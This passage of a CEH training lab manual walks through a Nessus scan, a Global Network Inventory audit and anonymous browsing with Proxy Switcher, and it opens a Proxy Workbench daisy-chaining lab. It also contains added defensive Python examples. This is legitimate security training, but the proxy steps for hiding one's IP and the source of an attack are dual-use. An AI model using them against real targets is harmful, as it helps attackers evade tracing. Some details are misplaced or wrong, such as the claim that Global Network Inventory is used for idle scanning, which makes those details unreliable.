30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot.

FIGURE 10.24: The Nessus main screen

31. If you have an Administrator role, you can see the Users tab, which lists all users, their roles, and their last logins.

Note: To add a new policy, click Policies -> Add Policy.
Note: New policies are configured using the Credentials tab.

FIGURE 10.25: The Nessus administrator view

32. To add a new policy, click Policies -> Add Policy. Fill in the General policy sections, namely Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance.

WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully.

FIGURE 10.26: Adding Policies

33. To configure the credentials of the new policy, click the Credentials tab shown in the left pane of Add Policy.
Note: The most effective credentialed scans are those for which the supplied credentials have root privileges.

FIGURE 10.27: Adding Policies and setting Credentials

34. To select the required plugins, click the Plugins tab in the left pane of Add Policy.

Note: If you are using Kerberos, you must configure the Nessus scanner to authenticate to a KDC.

FIGURE 10.28: Adding Policies and selecting Plugins

35. To configure preferences, click the Preferences tab in the left pane of Add Policy.

36. In the Plugin field, select Database settings from the drop-down list.

Note: If the policy is successfully added, the Nessus server displays a confirmation message.

37. Enter the Login details given at the time of registration.

38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA.

39. Click Submit.
FIGURE 10.29: Adding Policies and setting Preferences

40. A message Policy "NetworkScan_Policy" was successfully added is displayed, as shown below.

FIGURE 10.30: The NetworkScan Policy

41. Now, click Scans -> Add to open the Add Scan window.

42. Fill in the fields Name, Type, Policy, and Scan Target.

43. In Scan Targets, enter the IP address of your network; here in this lab we are scanning 10.0.0.2.

44. Click Launch Scan at the bottom-right of the window.

Note: The IP addresses may differ in your lab environment.

Note: To add a scan, fill in the fields Name, Type, Policy, Scan Target, and Target File in the Add Scan window.
Note: Nessus has the ability to save configured scan policies, network targets, and reports as a .nessus file.

FIGURE 10.31: Add Scan

45. The scan launches and starts scanning the network.

FIGURE 10.32: Scanning in progress

46. After the scan is complete, click the Reports tab.

FIGURE 10.33: Nessus Reports tab

47. Double-click Local Network to view the detailed scan report.

FIGURE 10.34: Report of the scanned target
48. Double-click any result to display a more detailed synopsis, description, security level, and solution.

FIGURE 10.35: Report of a scanned target

49. Click the Download Report button in the left pane.

50. You can download the available reports with a .nessus extension by choosing the format from the Download Format drop-down list (the Chapters option shows "Chapter Selection Not Allowed" for this format) and clicking Submit.

Note: If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentication.

FIGURE 10.36: Download Report with .nessus extension

51. Now, click Log out.

52. In the Nessus Server Manager, click Stop Nessus Server.

FIGURE 10.37: Log out Nessus

Lab Analysis

Document all the results and reports gathered during the lab.

Note: To stop the Nessus server, go to the Nessus Server Manager and click the Stop Nessus Server button.
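The downloaded .nessus file is XML, so the lab write-up can be produced from it rather than by reading the GUI report host by host. The following is an added example, not code from the CEH lab or from Tenable: it parses a constructed report whose element layout mirrors a .nessus v2 export (NessusClientData_v2 > Report > ReportHost > ReportItem, with the synopsis, description and solution children that steps 48 and 50 refer to) and summarizes findings per host and severity. The plugin IDs, plugin names and the target host in the sample are placeholders, not real Nessus plugins.

```python
"""Summarize a Nessus .nessus (v2 XML) export by host and severity.

Added example, not part of the lab or of Nessus. SAMPLE_NESSUS is constructed
to mirror the .nessus v2 element layout; plugin IDs 90001-90003 and their names
are placeholders.
"""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus 'severity' attribute values: 0 = Info, 1 = Low, 2 = Medium, 3 = High, 4 = Critical
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="Local Network">
    <ReportHost name="10.0.0.2">
      <HostProperties>
        <tag name="host-ip">10.0.0.2</tag>
        <tag name="operating-system">Windows Server 2008</tag>
      </HostProperties>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="90001" pluginName="Placeholder: host information" pluginFamily="General">
        <synopsis>Informational host details.</synopsis>
        <description>Constructed informational finding.</description>
        <solution>n/a</solution>
        <risk_factor>None</risk_factor>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="90002" pluginName="Placeholder: missing security update" pluginFamily="Windows">
        <synopsis>A required patch is not installed.</synopsis>
        <description>Constructed high-severity finding.</description>
        <solution>Apply the vendor update.</solution>
        <risk_factor>High</risk_factor>
      </ReportItem>
      <ReportItem port="139" svc_name="smb" protocol="tcp" severity="2"
                  pluginID="90003" pluginName="Placeholder: weak SMB configuration" pluginFamily="Windows">
        <synopsis>SMB signing is not required.</synopsis>
        <description>Constructed medium-severity finding.</description>
        <solution>Require SMB signing.</solution>
        <risk_factor>Medium</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem across all hosts in the report."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.findall("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "ip": props.get("host-ip", host.get("name")),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName", ""),
                "synopsis": (item.findtext("synopsis") or "").strip(),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def severity_summary(findings):
    """Count findings per host and severity name, e.g. {'10.0.0.2': {'High': 1, ...}}."""
    summary = {}
    for f in findings:
        per_host = summary.setdefault(f["host"], Counter())
        per_host[SEVERITY_NAMES[f["severity"]]] += 1
    return {h: dict(c) for h, c in summary.items()}


def actionable(findings, min_severity=2):
    """Findings at Medium or above, most severe first, for the remediation list."""
    return sorted((f for f in findings if f["severity"] >= min_severity),
                  key=lambda f: (-f["severity"], f["port"]))


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    print(severity_summary(found))
    for f in actionable(found):
        print(f"{f['ip']}:{f['port']}/{f['protocol']} [{SEVERITY_NAMES[f['severity']]}] "
              f"{f['plugin_name']} -> {f['solution']}")
```

To use it on the lab's own report, read the downloaded .nessus file and pass its text to parse_nessus; the severity attribute, not the risk_factor text, is what the summary keys on, because the numeric value is stable across plugin families.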
Tool/Utility: Nessus
Information Collected/Objectives Achieved:
Scan Target Machine: Local Host
Performed Scan Policy: Network Scan Policy
Target IP Address: 10.0.0.2
Result: Local Host vulnerabilities

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with SecurityCenter.

2. Determine how the Nessus license works in a VM (Virtual Machine) environment.

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
Auditing Scanning by using Global Network Inventory

Global Network Inventory is used as an audit scanner in zero-deployment and agent-free environments. It scans computers by IP range, domain, groups of computers or single computers, defined by the Global Network Inventory host file.

Lab Scenario

With the development of network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network or its servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use it to compromise the entire system and any other data found, and from there can compromise other systems on the network. Similarly, if the attacker finds a workstation with administrative privileges and faults in that workstation's applications, they can execute arbitrary code or implant viruses to intensify the damage to the network. As a key technique in the network security domain, intrusion detection systems (IDSes) play a vital role in detecting various kinds of attacks and securing networks. So, as an administrator you should make sure that services do not run as the root user, and should pay attention to patches and updates for applications from vendors or security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. In this lab, you will learn how networks are scanned using the Global Network Inventory tool.

Lab Objectives

This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to:

■ Use the Global Network Inventory tool
Lab Environment

To carry out the lab, you need:

■ The Global Network Inventory tool, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ You can also download the latest version of Global Network Inventory from http://www.magnetosoft.com/products/global_network_inventory/gni_features.htm
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Global Network Inventory
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Global Network Inventory

Global Network Inventory is one of the de facto tools for security auditing and testing of firewalls and networks; it is also used for idle scanning.

Lab Tasks

TASK 1: Scanning the network

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 11.1: Windows Server 2012 - Desktop view

2. Click the Global Network Inventory app to open the Global Network Inventory window.
FIGURE 11.2: Windows Server 2012 - Apps

Note: Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.

3. The Global Network Inventory main window appears as shown in the following figure.

4. The Tip of the Day window also appears; click Close.

Note: Scan only the items that you need by customizing the scan elements.

5. Turn on the Windows Server 2008 virtual machine from Hyper-V Manager.

FIGURE 11.3: Global Network Inventory Main Window
FIGURE 11.4: Windows 2008 Virtual Machine

6. Now switch back to the Windows Server 2012 machine; a New Audit Wizard window appears ("This wizard will guide you through the process of creating a new inventory audit. To continue, click Next."). Click Next (or, in the toolbar, select the Scan tab and click Launch audit wizard).

Note: Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices.

Note: View scan results, including historic results, for all scans, individual machines, or a selected number of addresses.

7. Select IP range scan and then click Next in the Audit Scan Mode wizard.

FIGURE 11.5: Global Network Inventory new audit wizard
The Audit Scan Mode page reads: "To start a new audit scan you must choose the scenario that best fits how you will be using this scan."

■ Single address scan: choose this mode if you want to audit a single computer.
■ IP range scan (selected): choose this mode if you want to audit a group of computers within a single IP range.
■ Domain scan: choose this mode if you want to audit computers that are part of the same domain(s).
■ Host file scan: choose this mode to audit computers specified in the host file. The most common scenario is to audit a group of computers without auditing an IP range or a domain.
■ Export audit agent: choose this mode if you want to audit computers using a domain login script. An audit agent will be exported to a shared directory; it can later be used in the domain login script.

FIGURE 11.6: Global Network Inventory Audit Scan Mode

8. Set an IP range scan and then click Next in the IP Range Scan wizard.

9. In the Authentication Settings wizard, select Connect as, fill in the credentials of your Windows Server 2008 virtual machine, and click Next.

Note: Fully customizable layouts and color schemes on all views and reports.

Note: Export data to HTML, XML, Microsoft Excel, and text formats.

Note: Licenses are network-based rather than user-based. In addition, extra licenses to cover additional addresses can be purchased at any time if required.
Note: The program comes with dozens of customizable reports. New reports can be easily added through the user interface.

The Authentication Settings page offers "Connect as currently logged on user" or "Connect as" with Domain, User name, and Password fields.

FIGURE 11.8: Global Network Inventory Authentication settings

10. Leave the settings at their defaults and click Finish to complete the wizard. The final page ("You are ready to start a new IP range scan") offers these options: Do not record unavailable nodes; Open scan progress dialog when scan starts; Rescan nodes that have been successfully scanned; Rescan, but no more than once a day.

FIGURE 11.9: Global Network Inventory final Audit wizard

Note: Ability to generate reports on schedule after every scan, daily, weekly, or monthly.

Note: To configure reports, choose Reports | Configure reports from the main menu and select a report from the tree control on the left. Each report can be configured independently.

11. The scanning progress is displayed in the Scan progress window.
FIGURE 11.10: Global Network Inventory Scanning Progress (the Scan progress dialog lists each address in the range with its name, percent complete and timestamp, the elapsed time, and the count of scanned nodes)

Note: Filtering is a quick way to find a subset of data within a dataset. A filtered grid displays only the nodes that meet the criteria you specified for one or more columns.

12. After completion, the scanning results can be viewed as shown in the following figure.

Note: Global Network Inventory lets you change the grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column.

FIGURE 11.11: Global Network Inventory result window

13. Now select the Windows Server 2008 machine from the View results pane to view its individual results.
FIGURE 11.12: Global Network Inventory Individual machine results

14. The Scan summary section gives you a brief summary of the machines that have been scanned.

FIGURE 11.13: Global Network Inventory Scan Summary tab

15. The Bios section gives details of the BIOS settings.

Note: The Global Network Inventory grid color scheme is completely customizable. You can change the colors by selecting Tools | Grid colors from the main menu.

Note: To configure the results history level, choose Scan | Results history level from the main menu and set the desired history level.
FIGURE 11.14: Global Network Inventory Bios summary tab

16. The Memory tab summarizes the memory in your scanned machine.

FIGURE 11.15: Global Network Inventory Memory tab

Note: E-mail address - specifies the e-mail address that people should use when sending e-mail to you at this account. The e-mail address must be in the format name@company, for example someone@mycompany.com.

17. In the NetBIOS section, complete NetBIOS details can be viewed.
Note: Message subject - type the subject of your message. Global Network Inventory cannot post a message that does not contain a subject.

FIGURE 11.16: Global Network Inventory NetBIOS tab

18. The User groups tab shows user account details for the workgroup.

Note: Name - specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages.

19. The Logged on tab shows details of the accounts logged on to the machine.

FIGURE 11.17: Global Network Inventory User groups section
FIGURE 11.18: Global Network Inventory Logged on section

Note: Port - specifies the port number you connect to on your outgoing e-mail (SMTP) server. This port number is usually 25.

20. The Port connectors section lists the port connectors found on the scanned machine.

FIGURE 11.19: Global Network Inventory Port connectors tab

Note: Outgoing mail (SMTP) - specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages.

21. The Services section gives the details of the services installed on the machine.
FIGURE 11.20: Global Network Inventory Services section

22. The Network adapters section shows the adapter IP and adapter type.

Note: To create a new custom report that includes more than one scan element, choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize the settings as desired, and click the OK button.

Note: A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password.

FIGURE 11.21: Global Network Inventory Network Adapter tab

Lab Analysis

Document all the IP addresses, open ports, running applications, and protocols you discovered during the lab.
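The Services, User groups, Logged on and Shares tabs are most useful when a later audit is compared against an earlier one, since a service that appears, a firewall service that stops, or an account added to Administrators is what an administrator needs to notice. The following is an added example, not part of the lab and not Global Network Inventory's own code: it models two audits of the Windows Server 2008 target (10.0.0.7) as plain Python structures and reports the drift between them. Both snapshots are constructed; in a real run they would be filled from the tool's XML or text export. The service RemoteHelper and the account svc_backup are invented for the example.

```python
"""Compare two inventory audits of one host and report security-relevant drift.

Added example, not part of the lab or of Global Network Inventory. The two
snapshots are constructed; RemoteHelper and svc_backup are invented names.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Service:
    name: str
    start_mode: str   # Automatic / Manual / Disabled, as shown on the Services tab
    state: str        # Running / Stopped


@dataclass
class HostSnapshot:
    host: str
    ip: str
    services: dict        # service name -> Service
    admins: frozenset     # members of the local Administrators group (User groups tab)
    logged_on: frozenset  # accounts on the Logged on tab
    shares: frozenset     # names on the Shares tab


def snapshot_before():
    """Constructed baseline audit of the Windows Server 2008 target."""
    return HostSnapshot(
        host="WIN-D39MR5HL9E4", ip="10.0.0.7",
        services={
            "AppHostSvc": Service("AppHostSvc", "Automatic", "Running"),
            "AppIDSvc": Service("AppIDSvc", "Manual", "Stopped"),
            "MpsSvc": Service("MpsSvc", "Automatic", "Running"),  # Windows Firewall service
        },
        admins=frozenset({"WIN-D39MR5HL9E4\\Administrator"}),
        logged_on=frozenset({"WIN-D39MR5HL9E4\\Administrator"}),
        shares=frozenset({"ADMIN$", "C$", "IPC$"}),
    )


def snapshot_after():
    """Constructed follow-up audit containing changes a defender should notice."""
    s = snapshot_before()
    services = dict(s.services)
    services["MpsSvc"] = Service("MpsSvc", "Disabled", "Stopped")              # firewall turned off
    services["RemoteHelper"] = Service("RemoteHelper", "Automatic", "Running")  # invented new service
    return HostSnapshot(
        host=s.host, ip=s.ip, services=services,
        admins=s.admins | {"WIN-D39MR5HL9E4\\svc_backup"},  # invented account added to Administrators
        logged_on=s.logged_on,
        shares=s.shares | {"Shared"},
    )


def diff_snapshots(before, after):
    """Return (category, detail) tuples for every change between two audits."""
    findings = []
    for name, svc in sorted(after.services.items()):
        old = before.services.get(name)
        if old is None:
            findings.append(("new-service", f"{name} ({svc.start_mode}, {svc.state})"))
        elif (old.start_mode, old.state) != (svc.start_mode, svc.state):
            findings.append(("service-changed",
                             f"{name}: {old.start_mode}/{old.state} -> {svc.start_mode}/{svc.state}"))
    for name in sorted(before.services.keys() - after.services.keys()):
        findings.append(("service-removed", name))
    for who in sorted(after.admins - before.admins):
        findings.append(("new-administrator", who))
    for share in sorted(after.shares - before.shares):
        findings.append(("new-share", share))
    for who in sorted(after.logged_on - before.logged_on):
        findings.append(("new-logged-on", who))
    return findings


if __name__ == "__main__":
    for category, detail in diff_snapshots(snapshot_before(), snapshot_after()):
        print(f"{category:18} {detail}")
```

The comparison is deliberately keyed on names rather than on the full exported rows, so cosmetic differences between two exports (timestamps, column order) do not show up as drift; only the fields that change the host's exposure are compared.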
Tool/Utility: Global Network Inventory

Information Collected/Objectives Achieved:
IP Scan Range: 10.0.0.1 - 10.0.0.50
Scanned IP Address: 10.0.0.7, 10.0.0.4
Result:
■ Scan summary
■ Bios
■ Memory
■ NetBIOS
■ UserGroup
■ Logged On
■ Port connector
■ Services
■ Network Adapter

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how?
2. How can you export the Global Network agent to a shared network directory?

Internet Connection Required
□ Yes  ☑ No

Platform Supported
☑ Classroom  ☑ iLabs
Anonymous Browsing using Proxy Switcher

Proxy Switcher allows you to automatically execute actions, based on the detected network connection.

Lab Scenario

In the previous lab, you gathered information such as the scan summary, NetBIOS details, and the services running on a computer using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. A vulnerability has been identified in Microsoft Windows that involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, an attacker can find a computer's IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer's memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then examining the response to determine whether any random data from that computer's memory is included. As an expert penetration tester, you should follow standard security practice: to block such Internet-based attacks, block port 137 User Datagram Protocol (UDP) at the firewall. You must also understand how networks are scanned using Proxy Switcher.

Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to:
■ Hide your IP address from the websites you visit
■ Switch proxy servers for improved anonymous surfing
Lab Environment

To carry out the lab, you need:
■ Proxy Switcher, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher
■ You can also download the latest version of Proxy Switcher from this link: http://www.proxyswitcher.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Switcher
■ Administrative privileges to run tools

Lab Duration

Time: 15 Minutes

Overview of Proxy Switcher

Proxy Switcher allows you to automatically execute actions based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example, setting the proxy settings for Internet Explorer, Firefox, and Opera.

Lab Tasks

1. Install Proxy Switcher on Windows Server 2012 (Host Machine).
2. Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher
3. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.
4. This lab will work in the CEH lab environment on Windows Server 2012, Windows Server 2008, and Windows 7.
5. Open the Firefox browser on your Windows Server 2012, go to Tools, and click Options in the menu bar.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Automatic change of proxy configurations (or any other action) based on network information.
FIGURE 12.1: Firefox Options tab

6. Go to the Advanced profile in the Options wizard of Firefox, select the Network tab, and then click Settings.

FIGURE 12.2: Firefox Network Settings

7. Select the Use system proxy settings radio button, and click OK.

Often different Internet connections require completely different proxy server settings, and it is a real pain to change them manually.

Proxy Switcher is fully compatible with Internet Explorer, Firefox, Opera, and other programs.
Proxy Switcher supports the following command line options: -d: Activate direct connection

FIGURE 12.3: Firefox Connection Settings

8. Now to install Proxy Switcher Standard, follow the wizard-driven installation steps.
9. To launch Proxy Switcher Standard, go to the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 12.4: Windows Server 2012 - Desktop view

TASK 1: Proxy Servers Downloading

10. Click the Proxy Switcher Standard app to open the Proxy Switcher window.
OR
Click Proxy Switcher from the Tray Icon list.
FIGURE 12.5: Windows Server 2012 - Apps

FIGURE 12.6: Select Proxy Switcher

11. The Proxy List Wizard will appear as shown in the following figure; click Next.

Proxy Switcher is free to use without limitations for personal and commercial use.

If the server becomes inaccessible, Proxy Switcher will try to find a working proxy server; a reddish background will be displayed until a working proxy server is found.
Proxy Switcher supports LAN, dial-up, VPN, and other RAS connections.

12. Select the Find New Servers, Rescan Servers, Recheck Dead radio button from Common Tasks, and click Finish.

Proxy switching from the command line (can be used at logon to automatically set connection settings).

13. A list of downloaded proxy servers will be shown in the left panel.

FIGURE 12.7: Proxy List wizard

FIGURE 12.8: Select common tasks
FIGURE 12.9: List of downloaded proxy servers

14. To stop downloading the proxy servers, click the button shown in the following figure.

FIGURE 12.10: Click on Start button

15. Click Basic Anonymity in the right panel; it shows a list of downloaded proxy servers.

When Proxy Switcher is running in Keep-Alive mode, it tries to maintain a working proxy server connection by switching to a different proxy server if the current one dies. When the active proxy server becomes inaccessible, Proxy Switcher will pick a different server from the ProxySwitcher category. If the active proxy server is currently alive, the background will be green.
FIGURE 12.11: Selecting a downloaded proxy server from Basic Anonymity

16. Select one proxy server IP address from the right panel to switch to the selected proxy server, and click the icon.

FIGURE 12.12: Selecting the proxy server

17. The selected proxy server will connect, and it will show the following connection icon.

When running in Auto Switch mode, Proxy Switcher will switch active proxy servers regularly. The switching period can be set with a slider from 5 minutes to 10 seconds.

In addition to the standard add/remove/edit functions, the proxy manager contains functions useful for anonymous surfing and proxy availability testing.
FIGURE 12.13: Successful connection of selected proxy

18. Go to a web browser (Firefox), and type the following URL: http://www.proxyswitcher.com/check.php to check the selected proxy server's connectivity; if it is successfully connected, then it shows the following figure.

[Figure: the check page reports Your possible IP address is: 202.53.11.130, 192.168.1.1; Location: Unknown; Proxy Server: DETECTED; Proxy IP: 95.110.159.67; Proxy Country: Unknown]

FIGURE 12.14: Detected proxy server

19. Open another tab in the web browser, and surf anonymously using this proxy.

Starting from version 3.0, Proxy Switcher incorporates an internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support an HTTP proxy via Proxy Switcher. By default it waits for connections on localhost:3128.
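The check page in step 18 reports the addresses it can see and whether a proxy was detected. The following is an added example, not part of the lab and not proxyswitcher.com's own check.php (whose internals the lab does not describe): it shows how a server can derive such a report from the TCP peer address plus the headers that forwarding proxies commonly add. All addresses and headers are constructed, and a proxy that adds no headers cannot be detected this way.

```python
# Added example (not from the CEH lab or from proxyswitcher.com): what a
# "detect my proxy" page such as the one in step 18 can derive from the TCP
# peer address and the headers that forwarding proxies commonly add. All
# addresses and headers used here are constructed.
from dataclasses import dataclass, field
import ipaddress
import re

# Headers that forwarding proxies commonly add. Forwarded is RFC 7239; the
# rest are de facto conventions, so their presence is evidence, not proof.
FORWARDING_HEADERS = ("forwarded", "x-forwarded-for", "via", "x-real-ip")


@dataclass
class ProxyReport:
    peer_ip: str                      # address the TCP connection came from
    possible_ips: list = field(default_factory=list)
    proxy_detected: bool = False
    proxy_ip: str = ""                # the peer, once a proxy is detected
    evidence: list = field(default_factory=list)


def _valid_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def _strip_port(node):
    """'[2001:db8::1]:4711' -> '2001:db8::1', '1.2.3.4:80' -> '1.2.3.4'."""
    m = re.match(r"^\[(.+)\](?::\d+)?$|^([^:]+)(?::\d+)?$", node)
    return (m.group(1) or m.group(2)) if m else node


def _parse_forwarded(value):
    """Collect the for= nodes of an RFC 7239 Forwarded header."""
    nodes = []
    for element in value.split(","):
        for pair in element.split(";"):
            name, _, val = pair.strip().partition("=")
            if name.strip().lower() == "for":
                nodes.append(_strip_port(val.strip().strip('"')))
    return nodes


def analyse_request(peer_ip, headers):
    """Build a ProxyReport from the peer address and a {name: value} dict."""
    report = ProxyReport(peer_ip=peer_ip)
    lower = {k.lower(): v for k, v in headers.items()}
    candidates = []
    if "x-forwarded-for" in lower:
        candidates += [_strip_port(p.strip())
                       for p in lower["x-forwarded-for"].split(",")]
    if "forwarded" in lower:
        candidates += _parse_forwarded(lower["forwarded"])
    if "x-real-ip" in lower:
        candidates.append(_strip_port(lower["x-real-ip"].strip()))
    for name in FORWARDING_HEADERS:
        if name in lower:
            report.evidence.append(f"{name}: {lower[name]}")
    for ip in candidates:
        if _valid_ip(ip) and ip not in report.possible_ips:
            report.possible_ips.append(ip)
    if report.evidence:
        # A header-adding proxy gives itself away; the peer is the proxy.
        report.proxy_detected = True
        report.proxy_ip = peer_ip
    if not report.possible_ips:
        # No usable forwarding headers: all we know is the peer. A proxy
        # that adds nothing (high anonymity) lands here and is NOT detected.
        report.possible_ips = [peer_ip]
    return report


def format_report(report):
    """Render the report the way the check page in FIGURE 12.14 does."""
    lines = ["Your possible IP address is: " + ", ".join(report.possible_ips),
             "Proxy Server: "
             + ("DETECTED" if report.proxy_detected else "NOT DETECTED")]
    if report.proxy_detected:
        lines.append("Proxy IP: " + report.proxy_ip)
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed request as seen by the check page behind a non-anonymous
    # proxy that leaked both the client's public and private addresses.
    sample_headers = {"X-Forwarded-For": "202.53.11.130, 192.168.1.1",
                      "Via": "1.1 example-proxy"}
    print(format_report(analyse_request("95.110.159.67", sample_headers)))
```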
After the anonymous proxy servers have become available for switching, you can activate any one to become invisible to the sites you visit.

FIGURE 12.14: Surfing using proxy server

Lab Analysis

Document all the IP addresses of live (SSL) proxy servers and the connectivity you discovered during the lab.
Tool/Utility: Proxy Switcher

Information Collected/Objectives Achieved:
Server: List of available proxy servers
Selected Proxy Server IP Address: 95.110.159.54
Selected Proxy Country Name: ITALY
Resulting Proxy Server IP Address: 95.110.159.67

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine which technologies are used for Proxy Switcher.
2. Evaluate why Proxy Switcher is not open source.
Internet Connection Required
☑ Yes  □ No

Platform Supported
☑ Classroom  □ iLabs
Lab 13

Daisy Chaining using Proxy Workbench

Proxy Workbench is a unique proxy server, ideal for developers, security experts, and trainers, which displays data in real time.

Lab Scenario

You learned in the previous lab how to hide your actual IP using Proxy Switcher and browse anonymously. Similarly, an attacker with malicious intent can pose as someone else using a proxy server and gather information such as the account or bank details of an individual by performing social engineering. Once the attacker gains the relevant information, he or she can hack into that individual's bank account for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace the real source of attacks. As an administrator, you should be able to prevent such attacks by deploying an intrusion detection system with which you can collect network information for analysis to determine whether an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned.

Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to:
■ Use the Proxy Workbench tool
■ Daisy chain the Windows host machine and virtual machines

Lab Environment

To carry out the lab, you need:
■ Proxy Workbench, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench
■ You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Another computer running Windows Server 2008 and Windows 7 as victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Workbench
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Proxy Workbench

Proxy Workbench is a proxy server that displays its data in real time. It shows the data flowing between web browser and web server, and can even analyze FTP in passive and active modes.

Lab Tasks

1. Install Proxy Workbench on all platforms of the Windows operating system (Windows Server 2012, Windows Server 2008, and Windows 7).
2. Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench
3. You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com
4. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.
5. This lab will work in the CEH lab environment on Windows Server 2012, Windows Server 2008, and Windows 7.
6. Open the Firefox browser on your Windows Server 2012, go to Tools, and click Options.

Security: Proxy servers provide a level of security within a network. They can help prevent security attacks, as the only way into the network from the Internet is via the proxy server.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 13.1: Firefox Options tab

7. Go to the Advanced profile in the Options wizard of Firefox, select the Network tab, and then click Settings.

FIGURE 13.2: Firefox Network Settings

The Sockets panel shows the number of alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zero.
8. Check Manual proxy configuration in the Connection Settings wizard.
9. Type the HTTP Proxy as 127.0.0.1, enter the port value as 8080, check the option Use this proxy server for all protocols, and click OK.

FIGURE 13.3: Firefox Connection Settings

10. While configuring, if you encounter any port error, please ignore it.
11. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 13.4: Windows Server 2012 - Desktop view

12. Click the Proxy Workbench app to open the Proxy Workbench window.

The status bar shows the details of Proxy Workbench's activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this, due to the overhead of managing it.

Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.
FIGURE 13.5: Windows Server 2012 - Apps

13. The Proxy Workbench main window appears as shown in the following figure.

